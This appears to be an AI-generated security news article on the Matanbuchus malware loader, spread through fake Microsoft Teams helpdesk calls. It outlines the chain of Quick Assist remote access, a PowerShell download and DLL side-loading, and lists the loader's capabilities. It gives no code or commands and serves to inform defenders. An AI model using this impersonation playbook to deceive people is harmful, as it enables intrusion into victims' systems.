Ethical Hacking News
Abuse of Microsoft Teams voice calls for malicious purposes has been linked to the latest version of the Matanbuchus malware loader, which includes enhanced evasion, obfuscation, and post-compromise capabilities.
Malicious actors are exploiting Microsoft Teams users through social engineering tactics to deliver malicious payloads. The Matanbuchus malware loader is being distributed through fake IT helpdesk calls impersonating Microsoft Teams, aiming to execute malicious payloads directly in memory. The latest version of Matanbuchus includes enhanced evasion, obfuscation, and post-compromise capabilities, making it a sophisticated threat. Microsoft Teams has been used in the past to breach organizations using social engineering tactics, with attackers tricking users into downloading malicious files or exploiting bugs in the software.
Microsoft Teams, a popular communication and collaboration platform used by millions of individuals and organizations worldwide, has been found to be abused by malicious actors seeking to exploit its users through social engineering tactics. This recent development highlights the evolving nature of cyber threats, where adversaries are increasingly leveraging legitimate platforms to deliver malicious payloads.
According to recent reports, the Matanbuchus malware loader has been identified as being distributed through Microsoft Teams calls impersonating IT helpdesk. The malware-as-a-service operation was first advertised on the dark web in early 2021 and was touted as a $2,500 Windows loader that could execute malicious payloads directly in memory to evade detection. The latest analyzed version of Matanbuchus has been found to include enhanced evasion, obfuscation, and post-compromise capabilities, making it a sophisticated threat.
Microsoft Teams has been abused in the past to breach organizations using social engineering tactics. Attackers would typically infiltrate the chat and trick users into downloading a malicious file that then introduces the initial payload on the system. In 2023, a researcher created a specialized tool that exploited bugs in the software to allow malware delivery from external accounts. Last year, DarkGate malware operators abused Microsoft Teams to deliver their loader onto targets who used lax ‘External Access’ settings.
In the case of Matanbuchus, attackers initiate an external Microsoft Teams call posing as a legitimate IT helpdesk, convincing the target to launch Quick Assist, the remote support tool built into Windows. Quick Assist enables the attacker to gain interactive remote access and follow up by instructing the user to execute a PowerShell script. This script downloads and extracts a ZIP archive with three files that are used to launch the Matanbuchus loader on the device via DLL side-loading.
The attackers utilize this tactic to gain initial access, followed by further exploitation of the compromised system. The post-infection capabilities of the Matanbuchus malware include executing CMD commands, PowerShell, or EXE, DLL, MSI, and shellcode payloads. It also collects details such as username, domain, OS build information, running EDR/AV processes, and the elevation status of its process (admin or regular user).
Researchers at Morphisec endpoint threat prevention company found that the latest analyzed version of Matanbuchus includes enhanced evasion, obfuscation, and post-compromise capabilities. The malware checks the running processes to identify security tools on the system, noting that the execution methods sent back from the C2 "are likely dependent on the current security stack of the victim."
In light of these findings, it is clear that Matanbuchus has developed into a sophisticated threat. It poses significant risks to individuals and organizations using Microsoft Teams for communication and collaboration.
Abuse of Microsoft Teams voice calls for malicious purposes has been linked to the latest version of the Matanbuchus malware loader, which includes enhanced evasion, obfuscation, and post-compromise capabilities.
Related Information:
https://www.ethicalhackingnews.com/articles/Abuse-of-Microsoft-Teams-Voice-Calls-for-Malicious-Purposes-The-Rise-of-Matanbuchus-ehn.shtml
https://www.bleepingcomputer.com/news/security/microsoft-teams-voice-calls-abused-to-push-matanbuchus-malware/
Published: Thu Jul 17 21:22:04 2025 by llama3.2 3B Q4_K_M
